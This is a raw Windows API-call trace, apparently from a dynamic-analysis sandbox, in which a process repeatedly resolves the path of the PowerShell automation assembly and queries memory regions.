	[0285.680] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.680] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c450, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.680] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.680] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.681] VirtualQuery (in: lpAddress=0x20ae30, lpBuffer=0x20bcf0, dwLength=0x30 | out: lpBuffer=0x20bcf0*(BaseAddress=0x20a000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0285.681] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20b9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.681] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20b900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.681] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20b900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.681] VirtualQuery (in: lpAddress=0x20ae30, lpBuffer=0x20bcf0, dwLength=0x30 | out: lpBuffer=0x20bcf0*(BaseAddress=0x20a000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0285.682] VirtualQuery (in: lpAddress=0x20aec0, lpBuffer=0x20bd80, dwLength=0x30 | out: lpBuffer=0x20bd80*(BaseAddress=0x20a000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0285.682] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20b5f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.682] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20b540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.682] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20b540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.682] VirtualQuery (in: lpAddress=0x20ae30, lpBuffer=0x20bcf0, dwLength=0x30 | out: lpBuffer=0x20bcf0*(BaseAddress=0x20a000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0285.682] VirtualQuery (in: lpAddress=0x20aec0, lpBuffer=0x20bd80, dwLength=0x30 | out: lpBuffer=0x20bd80*(BaseAddress=0x20a000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0285.682] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20b5f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.683] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20b540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.683] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20b540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.683] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20b9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.683] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20b900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.683] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20b900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.683] VirtualQuery (in: lpAddress=0x20ae30, lpBuffer=0x20bcf0, dwLength=0x30 | out: lpBuffer=0x20bcf0*(BaseAddress=0x20a000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0285.684] VirtualQuery (in: lpAddress=0x20aec0, lpBuffer=0x20bd80, dwLength=0x30 | out: lpBuffer=0x20bd80*(BaseAddress=0x20a000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0285.684] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20b5f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.684] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20b540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.684] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20b540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.684] VirtualQuery (in: lpAddress=0x20ae30, lpBuffer=0x20bcf0, dwLength=0x30 | out: lpBuffer=0x20bcf0*(BaseAddress=0x20a000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0285.684] VirtualQuery (in: lpAddress=0x20aec0, lpBuffer=0x20bd80, dwLength=0x30 | out: lpBuffer=0x20bd80*(BaseAddress=0x20a000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0285.684] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20b9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.685] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20b900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.685] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20b900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.685] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20b9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.685] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20b900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.685] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20b900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.686] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20b9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.686] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20b900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.686] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20b900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.686] VirtualQuery (in: lpAddress=0x20ae30, lpBuffer=0x20bcf0, dwLength=0x30 | out: lpBuffer=0x20bcf0*(BaseAddress=0x20a000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0285.686] VirtualQuery (in: lpAddress=0x20aec0, lpBuffer=0x20bd80, dwLength=0x30 | out: lpBuffer=0x20bd80*(BaseAddress=0x20a000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0285.686] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20b5f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.687] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20b540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.687] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20b540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.687] VirtualQuery (in: lpAddress=0x20ae30, lpBuffer=0x20bcf0, dwLength=0x30 | out: lpBuffer=0x20bcf0*(BaseAddress=0x20a000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0285.687] VirtualQuery (in: lpAddress=0x20aec0, lpBuffer=0x20bd80, dwLength=0x30 | out: lpBuffer=0x20bd80*(BaseAddress=0x20a000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0285.687] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20b5f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.687] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20b540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.687] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20b540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.688] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c2c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.688] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.688] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.688] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.688] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c080, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.688] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c080, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.689] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c450, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.689] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.689] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.689] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c450, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.689] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.689] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.690] VirtualQuery (in: lpAddress=0x20b8d0, lpBuffer=0x20c790, dwLength=0x30 | out: lpBuffer=0x20c790*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0285.690] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c090, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.690] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20bfe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.690] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20bfe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.690] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20bb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.691] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20ba90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.691] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20ba90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.691] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20bb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.691] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20ba90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.691] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20ba90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.691] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20bb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.692] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20ba90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
